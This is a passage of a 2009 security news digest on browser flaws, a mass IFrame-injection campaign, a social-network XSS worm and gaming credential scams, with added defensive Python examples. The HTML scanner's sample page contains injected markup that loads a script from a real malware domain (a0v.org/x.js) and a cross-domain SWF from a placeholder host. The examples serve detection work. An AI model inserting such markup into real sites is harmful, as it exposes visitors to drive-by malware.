38. August 26, The Register – (International) MS phishing filter blacklists everything. A wide range of uk.com websites were misclassified as malign by anti-phishing technology built into the latest versions of Microsoft’s browser software on August 26. Microsoft’s SmartScreen Filter, which is built into IE7 and IE8, labelled every site under the uk.com domain as a phishing site following what appears to be a dodgy rule change applied overnight. Many of the sites have been unblocked, but many others remain labelled as potentially dangerous to surfers visiting the site with Microsoft’s consumer protection technology running. The issue created a headache for UK ISPs, with hosting customers calling up wondering what was going on. An ISP source who was the first to tell The Register about the problem said that its phones are “red hot” from calls about the issue. Microsoft responded to The Register’s queries promptly by saying it was investigating the issue. CentralNic, registrar for uk.com domains, published a statement saying Microsoft has promised to resolve the problem within two hours, by 1330 BST. “We have been made aware that the Microsoft SmartScreen filter included with Internet Explorer 8 is erroneously marking some domain names as being unsafe,” it said. “The most likely explanation is that a genuinely unsafe website under one of our suffixes was reported to Microsoft, but they incorrectly added all the domains under that suffix to their list of unsafe websites.” Source: http://www.theregister.co.uk/2009/08/26/ms_phishing_filter/
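The failure CentralNic describes in item 38, a whole suffix blocked because one site under it was reported, comes from reducing a hostname to its "registrable domain" without knowing that uk.com is itself a suffix. The following Python is an added example, not Microsoft’s or CentralNic’s code, contrasting a naive last-two-labels rule with a suffix-aware one over a constructed mini suffix list and constructed hostnames.

```python
# Added example (not Microsoft's or CentralNic's code): block-listing by
# registrable domain, with and without knowledge that "uk.com" is a suffix.

# Constructed mini suffix list. A real implementation loads the full
# Public Suffix List; only the entries this example needs are here.
SUFFIXES = {"com", "org", "info", "co.uk", "uk.com"}


def _labels(host):
    return host.strip().lower().rstrip(".").split(".")


def registrable_domain_naive(host):
    """The mistake: assume the registrable domain is always the last two labels."""
    return ".".join(_labels(host)[-2:])


def registrable_domain(host, suffixes=SUFFIXES):
    """Registrable domain = longest matching public suffix plus one more label.

    Returns None when the host is itself a suffix or its suffix is unknown, so a
    caller can never block an entire suffix by accident.
    """
    labels = _labels(host)
    for i in range(len(labels)):          # longest candidate suffix first
        if ".".join(labels[i:]) in suffixes:
            return None if i == 0 else ".".join(labels[i - 1:])
    return None


class PhishBlocklist:
    """Stores reported sites by registrable domain; the extractor is pluggable."""

    def __init__(self, extract=registrable_domain):
        self._extract = extract
        self._blocked = set()

    def add_report(self, reported_host):
        domain = self._extract(reported_host)
        if domain is None:
            raise ValueError(f"refusing to block a bare or unknown suffix: {reported_host}")
        self._blocked.add(domain)

    def is_blocked(self, host):
        return self._extract(host) in self._blocked


if __name__ == "__main__":
    # Constructed hostnames: one reported site and one innocent neighbour.
    for name, extractor in (("naive", registrable_domain_naive), ("suffix-aware", registrable_domain)):
        bl = PhishBlocklist(extractor)
        bl.add_report("www.bad.uk.com")
        print(name, "blocks innocent www.good.uk.com:", bl.is_blocked("www.good.uk.com"))
```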


39. August 25, CNET News – (International) Google patches severe Chrome vulnerabilities. Google has fixed two high-severity vulnerabilities in the stable version of its Chrome browser that could have let an attacker remotely take over a person’s computer. With one attack on Google’s V8 JavaScript engine, malicious JavaScript on a Web site could let an attacker gain access to sensitive data or run arbitrary code on the computer within a Chrome protected area called the sandbox, Google said in a blog post Tuesday. With the other, a page with XML-encoded information could cause a browser tab crash that could let an attacker run arbitrary code within the sandbox. Chrome 2.0.172.43 fixes the issues and another medium-severity issue. Once Chrome is installed, it retrieves updates automatically and applies them when people restart the browser. Google won’t release details of the vulnerabilities until “a majority of users are up to date with the fix,” an engineering program manager said in the blog post. Source: http://news.cnet.com/8301-30685_3-10317320-264.html


40. August 25, Softpedia – (International) Over 62,000 new URLs serving exploit cocktail. Security researchers advise that a new mass compromise attack is underway and has affected over 62,000 URLs to date. A rogue IFrame injected into the compromised Web pages loads a cocktail of exploits and malware from other domains. Web security company ScanSafe has been monitoring this new threat and advises that the infection pattern is a hidden IFrame loading JavaScript content from a domain called a0v.org. A Google search for “script src= reveals 62,100 results. A senior security researcher at ScanSafe has told The Register that the infections are the result of SQL injection attacks. The x.js called from a0v.org has the role of loading exploits from seven other domain names. At the moment of writing this article, Google’s Safe Browsing was tagging a0v.org as malicious. “The malware hosting domains were registered on or after August 3, 2009 and include: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info. The most prolific observed by ScanSafe thus far has been ahthja.info,” the researcher writes on the company’s blog. If exploitation is successful, several malware installers are dropped and executed onto the victim’s computer as drive-by downloads. The security researcher warns that “post infection, additional malware may also be downloaded” from a different host. The exploits target vulnerabilities in popular software, including Internet Explorer, Mozilla Firefox, Adobe Flash Player, Adobe Reader and Acrobat or avast! Antivirus. AV detection rates for the malicious executables downloaded during the attack range from poor to moderate on Virustotal. Source: http://news.softpedia.com/news/Over-62-000-New-URLs-Serving-Exploits-Cocktail-120006.shtml


41. August 25, Softpedia – (International) New Chinese social networking worm discovered. Security researchers warn that a new worm has been spotted on Chinese social networking website Renren.com. The worm masquerades as a Flash music video of Pink Floyd’s Wish You Were Here and spreads by exploiting a cross-site scripting hole. The message has the title “Pink Floyd – Wish You Were Here” and it contains a maliciously crafted Flash component loaded with the AllowScriptAccess=“always” parameter. According to Adobe, “When AllowScriptAccess is ‘always’, the SWF file can communicate with the HTML page in which it is embedded even when the SWF file is from a different domain than the HTML page.” The Flash file is used to execute the JavaScript code present in the message body and load a script called evil.js from an external domain. As researchers indicate, the JavaScript code is used to exploit a cross-site scripting (XSS) flaw present in the website and spread the worm through its API. Social networking worms have been increasing in number for the past few years, suggesting that these new platforms are good hunting grounds for cybercrooks. Boris Lau, a virus researcher at antivirus vendor Sophos, which detects this new threat as W32/Pinkren-A, points out that “this is same technique used back in 2007 by the Okurt worm.” Renren is a Facebook-like website very successful in China. Such local threats are important to Westerners as well, because Chinese computers compromised by worms like these will join to form large botnets. These armies of zombie computers will then be used to send spam and perform distributed denial of service attacks globally. Source: http://news.softpedia.com/news/New-Chinese-Social-Networking-Worm-Discovered-120021.shtml
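Items 40 and 41 both turn on markup injected into a page: a hidden IFrame pulling script from another domain (item 40) and an SWF embedded with AllowScriptAccess="always" from another domain (item 41). The following Python is an added example, not ScanSafe’s, Sophos’s or Renren’s code, that scans a page’s HTML for those two patterns so a site owner can sweep their own pages; the sample page, the site host www.site.example and the host evil.example are constructed, and the a0v.org/x.js reference is the loader named in item 40.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Added example (not from the page's sources): flag the markup patterns the two
# items describe, for use over a site's own pages after a suspected compromise.


def _host(url):
    """Hostname of an absolute URL; '' for a relative reference."""
    netloc = urlsplit(url.strip()).netloc.lower()
    return netloc.rsplit("@", 1)[-1].split(":")[0]


def _hidden(attrs):
    """True for display:none / visibility:hidden or a frame of at most 1x1 pixels."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        w = int(attrs.get("width", "").strip().lower().rstrip("px"))
        h = int(attrs.get("height", "").strip().lower().rstrip("px"))
    except ValueError:          # missing or non-numeric size: not a hidden frame
        return False
    return w <= 1 and h <= 1


class InjectionScanner(HTMLParser):
    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.site_host = site_host.lower()
        self.allowed = {h.lower() for h in allowed_hosts}   # e.g. a known CDN
        self.findings = []      # (kind, url) tuples
        self._obj = None        # state while inside <object> ... </object>

    def _external(self, url):
        host = _host(url)
        if not host or host == self.site_host or host.endswith("." + self.site_host):
            return False
        return host not in self.allowed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}     # HTMLParser lowercases attribute names
        if tag == "iframe" and self._external(a.get("src", "")) and _hidden(a):
            self.findings.append(("hidden-external-iframe", a["src"]))
        elif tag == "script" and self._external(a.get("src", "")):
            self.findings.append(("external-script", a["src"]))
        elif tag == "embed":
            if a.get("allowscriptaccess", "").lower() == "always" and self._external(a.get("src", "")):
                self.findings.append(("cross-domain-swf-scriptaccess", a["src"]))
        elif tag == "object":
            self._obj = {"src": a.get("data", ""), "access": ""}
        elif tag == "param" and self._obj is not None:
            name = a.get("name", "").lower()
            if name == "movie":
                self._obj["src"] = a.get("value", "")
            elif name == "allowscriptaccess":
                self._obj["access"] = a.get("value", "").lower()

    def handle_endtag(self, tag):
        if tag == "object" and self._obj is not None:
            if self._obj["access"] == "always" and self._external(self._obj["src"]):
                self.findings.append(("cross-domain-swf-scriptaccess", self._obj["src"]))
            self._obj = None


def scan_html(document, site_host, allowed_hosts=()):
    scanner = InjectionScanner(site_host, allowed_hosts)
    scanner.feed(document)
    scanner.close()
    return scanner.findings


# Constructed page: one legitimate script, one same-site frame, plus the two
# injected patterns. www.site.example and evil.example are placeholders;
# a0v.org/x.js is the loader named in item 40.
SAMPLE_HTML = """<html><body>
<script src="/js/app.js"></script>
<iframe src="https://www.site.example/widget" width="300" height="200"></iframe>
<iframe src="http://a0v.org/x.js" width="0" height="0" style="display:none"></iframe>
<object data="http://evil.example/wish_you_were_here.swf">
  <param name="allowScriptAccess" value="always">
</object>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_HTML, "www.site.example"):
        print(kind, url)
```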


42. August 24, The Register – (International) Scammers step up attacks on Warcraft players. A researcher from anti-virus firm Webroot has written how official forums offered by WoW creator Blizzard are being used to spread links that lead to malware that steals passwords and other game credentials. The scam employs the common technique of telling visitors that their Adobe Flash player needs to be updated and then offering a malicious trojan instead of the real installation file. Elsewhere, phishers are churning out emails that purport to be official communications from Blizzard, according to researchers from security provider Sophos. The emails claim the game maker is launching a new service and invite recipients to click on a link for a free sneak peek. The resulting website, in turn, phishes user credentials. The attack outbreaks come a few weeks after Blizzard issued an update for Warcraft III that fixed a gaping hole that could lead to the complete hijacking of machines running the real-time strategy game. According to a Webroot researcher it was exploited simply by getting vulnerable victims to join a custom game hosted with booby-trapped maps. Attackers targeted the vulnerability in a game called DotA, or Defense of the Ancients, by creating fake maps that used the same file configurations as legitimate custom maps. “What makes this exploit particularly nasty is the fact that your PC gets infected the moment you join a game where the infected DotA map is in use,” the researcher wrote. “Once downloaded, the game automatically unpacks the infected map and executes the malicious code.” Source: http://www.theregister.co.uk/2009/08/24/world_of_warcraft_attacks/

Communications Sector

43. August 26, Information Week – (International) Dell launches 10 gigabit ethernet in storage array. Dell on August 25 introduced an upgrade of its Dell/EMC CX4 storage arrays that includes a 10 Gigabit Ethernet option, which the vendor says addresses the input/output needs for the growing compute density of virtualized environments within data centers. The latest version of the CX4 arrays contains a UltraFlex Modular I/O that enables customers to add ports supporting 8 Gb and 4 Gb Fibre Channel and 1 Gb and 10 Gb iSCSI. The latter enables companies to consolidate “stranded servers” onto an existing storage-area network, support more virtual servers and aggregate multiple 1 Gb iSCSI connections into fewer 10 Gb ones, Dell said. “Ethernet is increasingly being chosen as the networking technology for storage as customers look to consolidate and virtualize their data centers,” the vice president of enterprise storage and networking at Dell said in a statement. “With a 10 gigabit option and its inherent advantages in virtualized environments, Ethernet’s case gets even stronger as the most simple and capable networking fabric.” In addition, Dell has added virtualization-aware Navisphere management software that provides automatic discovery of virtual machines and VMware ESX servers, virtual-to-physical machine mapping and advanced search for VMs. Finally, the array upgrade includes drive spin-down as a standard feature to help reduce power and cooling requirements. The feature enables users to set policies for drives to power down when not in use. Source: http://www.informationweek.com/news/storage/virtualization/showArticle.jhtml?articleID=219401489


44. August 26, Wired News – (International) Cutbacks could be causing IT outages. When eBay’s PayPal unit suffered a worldwide outage early this month, Sailrite Enterprises Inc., a sailing supply company based in Churubusco, Ind., lost its critical customer payment services for six hours. The next day, August 4, PayPal’s services failed Sailrite again, this time for about an hour, according to a vice president at Sailrite. He posted a blunt message on PayPal’s blog site: “This is not acceptable.” In an e-mail, San Jose-based PayPal blamed the outage on a problem with a “back-end router” that was complicated by a failure in the company’s redundancy measures. The PayPal electronic payment system is one of many Internet-based services that have been hit with outages. And based on news reports, the number of such incidents appears to have been increasing in recent months, analysts said. They cited shutdowns of the Google Apps software hosted by Google, outages at data centers run by Rackspace Hosting Inc. and a distributed denial-of-service attack on Twitter. Observers pointed to several possible reasons for the apparent uptick in online outages, including IT budget and personnel cutbacks, increasing corporate dependence on hosted applications, and bad luck. The chief security strategist at Citrix Systems in Fort Lauderdale, Florida, said he wonders whether a two-hour shutdown of Cisco Systems’ Web site this month “would [have] happened a few years ago … when they had multiple people checking every single change.” Cisco blamed the outage on human error. IT staff cuts spurred by the economy are likely to continue throughout the remainder of the year. According to a survey of 300 IT center managers last year by the Association for Computer Operations Management, half of all data centers were planning to cut 2009 budgets by an average of 15%. Respondents at 14% of those companies said the cuts would include layoffs of IT staffers. An executive director of Uptime Institute Inc., a data center engineering and consulting firm, said such budget and personnel cutbacks can prove disastrous to IT. “We’re not doing the maintenance we should be doing, and when you don’t do maintenance, you increase the probability of catastrophic failure,” he said. The executive added that energy-efficiency efforts may be prompting data centers to cut back on redundant equipment and run their systems harder, exposing equipment flaws. Source: http://www.wired.com/epicenter/2009/08/cutbacks-could-be-causing-it-outages/


45. August 25, SCMagazine – (International) Wireless flaw could let hackers breach wired network. Researchers at a security firm on August 25 disclosed a vulnerability within the Cisco wireless framework that could offer intruders a gaping entryway into an organization’s network. The AirMagnet Intrusion Research Team said it discovered an exploit, known as “skyjacking,” which could enable someone, either on purpose or by accident, to take control of a wireless access point (AP) and point it to an outside Cisco controller. “Access points do not normally get connected to the wrong controller,” AirMagnet’s director of product management told SCMagazineUS.com on August 24. “If [one does], you have a big problem. We’ve uncovered a way where, by accident or design, an access point could get connected to the wrong controller or a controller that’s not in its network.” By doing that, attackers could assume control of a legitimate access point, which not only gives them visibility into relayed data but also could open the gates into an organization’s wired network. “You’ve taken an approved AP and turned it rogue,” the director said. “At this point, you’ve got the keys to the castle. You have an authorized wireless connection into a wired network. Not only would you be able to see everything that access point does but, more importantly, you’ll have accessed your way into the wired part of that network...So you’ve got a full breach.” Researchers at AirMagnet, which has been acquired by Fluke Networks, also detected another problem in the Cisco network. Leveraging Cisco’s Over-the-Air Provisioning feature, engineers found that data belonging to wireless controllers, such as IP and media access control (MAC) addresses, is inadvertently broadcast unencrypted. With that information, attackers can target these devices, which support large numbers of access points, with attacks such as denial-of-service attempts, the AirMagnet director said. In addition, intruders can use the data to learn more about a company’s network topology. Source: http://www.scmagazineus.com/wireless-flaw-could-let-hackers-breach-wired-network/article/147241/


46. August 25, Datamation – (International) 85 cloud computing vendors shaping the emerging cloud. The era of cloud computing is dawning amid great fanfare, supported by mountains of cash and reams of hype. Whether this change is positive is debatable, and very real concerns plague cloud computing, but the tech industry has decided: the cloud is king. Just as the hulking mainframes of the 1960s were replaced by client-server systems in the 1980s, the in-house datacenter is now shifting toward an externally-based model. Vendors of every size are maneuvering, targeting this new market. The U.S. government just unveiled plans to start offering cloud computing services to federal agencies. Currently, many vendors are slapping the term ‘cloud’ on their product. Cloud computing allows for access to software over the Web, instead of from a local hard drive. Software might sit on a server in New York or New Delhi or New Haven, Connecticut. Or maybe that app combines services from apps that reside in New York and New Delhi, with an add-on from a New Haven provider. Microsoft, with its Azure cloud initiative, is quietly investing massively in leviathan datacenters across the country to host its cloud offering. IBM’s cloud push benefits greatly from the company’s global stance and deep focus on services. Google’s cloud strategy is supremely well positioned, with a well-tuned international server network and its Web-based Chrome OS. Some industry wags deride Amazon as the utility cloud provider whose offering isn’t differentiated enough, yet it keeps growing. Source: http://itmanagement.earthweb.com/entdev/article.php/3835941/85-Cloud-Computing-Vendors-Shaping-the-Emerging-Cloud.htm